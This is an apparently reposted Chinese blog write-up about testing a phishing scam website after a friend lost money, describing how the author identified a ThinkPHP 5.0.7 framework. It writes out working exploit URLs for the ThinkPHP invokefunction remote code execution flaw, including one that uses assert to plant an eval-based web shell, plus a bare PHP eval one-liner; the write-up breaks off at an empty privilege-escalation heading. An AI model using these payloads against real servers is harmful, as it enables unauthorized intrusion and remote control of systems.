记一次对钓鱼诈骗网站的测试(钓鱼欺诈网页)

网友投稿 284 2022-10-01


记一次对钓鱼诈骗网站的测试(钓鱼欺诈网页)

前言背景

一个学长前几天不幸在钓鱼网站中招被骗走一些资金,在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动

外网对网站打点

在对网站进行初步信息收集后发现网站使用​​ThinkPHP5.0.7​​框架,直接找到​​ThinkPHP​​对应版本的Exp进行尝试:

//执行phpinfo

eval($_POST['cmd']);?>

http://hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

发现并没有出现回显,尝试反弹​​Shell​​也无功而返,这个时候感觉到​​system​​可能被禁用了,改用​​eval​​依旧无果,最后使用​​assert​​发现可以成功执行,直接构造​​Shell​​连接:

http:///index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_POST[ye])

提权未遂


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:为何现代企业纷纷选择基于云的LDAP?(企业上云就是企业采用云计算)
下一篇:Java 高并发的三种实现案例详解
相关文章

 发表评论

评论列表